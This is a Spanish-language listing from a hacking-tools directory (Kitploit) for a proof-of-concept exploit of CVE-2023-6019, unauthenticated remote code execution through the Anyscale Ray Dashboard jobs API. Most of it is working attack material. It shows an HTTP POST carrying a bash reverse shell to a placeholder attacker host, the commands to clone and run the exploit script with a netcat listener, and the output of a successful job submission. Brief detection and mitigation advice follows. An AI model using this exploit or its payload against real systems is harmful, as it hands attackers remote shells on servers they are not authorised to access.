Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-6019 — PoC exploit para CVE-2023-6019 - Ejecución Remota de Código a través de la API de Trabajos del Panel de Ray no autenticada. | Kitploit
Herramientas/GitHubGitHub/joaquinrrr/cve-2023-6019
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubjoaquinrrr/cve-2023-6019

CVE-2023-6019

PoC exploit para CVE-2023-6019 - Ejecución Remota de Código a través de la API de Trabajos del Panel de Ray no autenticada.

Ver Repositorio
6hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-6019 - Anyscale Ray Dashboard RCE no autenticada

PoC exploit para CVE-2023-6019 — Ejecución remota de código a través de la API de trabajos del Ray Dashboard sin autenticación.
Creado por oguiii


Descripción

Anyscale Ray es un framework de código abierto para cargas de trabajo distribuidas de ML/IA. Las versiones anteriores a 2.6.4 exponen una API de envío de trabajos a través del Ray Dashboard (puerto predeterminado 8265) sin ninguna autenticación, permitiendo a un atacante no autenticado enviar trabajos arbitrarios y lograr Ejecución Remota de Código en el host.

  • CVE: CVE-2023-6019
  • Severidad: Crítica (CVSS 9.8)
  • Versiones afectadas: Ray < 2.6.4
  • Corregido en: Ray 2.6.4
  • Vector de ataque: Red (solicitud HTTP no autenticada)

Cómo funciona

El endpoint /api/jobs/ acepta un payload JSON con un campo entrypoint que se ejecuta como un comando de shell por el proceso trabajador de Ray - sin necesidad de credenciales.

root@kitploit:~
POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
  "runtime_env": {},
  "job_id": null,
  "metadata": {}
}

Uso

root@kitploit:~
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <TARGET_IP> -p <PORT> -l <LHOST> -lp <LPORT>

Argumentos

Ejemplo

root@kitploit:~
# Iniciar listener
nc -lvnp 4444

# Ejecutar exploit
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444

Salida esperada

root@kitploit:~
[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version     : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019

[*] Target        : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...

[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc

[>] Make sure your listener is ready:
    nc -lvnp 4444

Detección

Busque solicitudes POST inesperadas a /api/jobs/ en el puerto 8265 en sus registros HTTP o tráfico de red.


Mitigación

  • Actualice a Ray >= 2.6.4
  • Restrinja el acceso al puerto del Ray Dashboard (8265) mediante reglas de firewall
  • No exponga el Ray Dashboard a redes públicas

Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2023-6019
  • https://www.anyscale.com/
  • https://github.com/ray-project/ray

Descargo de responsabilidad

Esta herramienta está destinada únicamente a pruebas de penetración autorizadas y fines educativos.
El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.
Siempre obtenga la autorización escrita adecuada antes de realizar pruebas.

Descargar herramienta
FlagDescripciónPor defecto
-tIP o nombre de host objetivorequerido
-pPuerto del Ray Dashboard8265
-lIP del atacante (shell reversa)requerido
-lpPuerto del atacante (shell reversa)requerido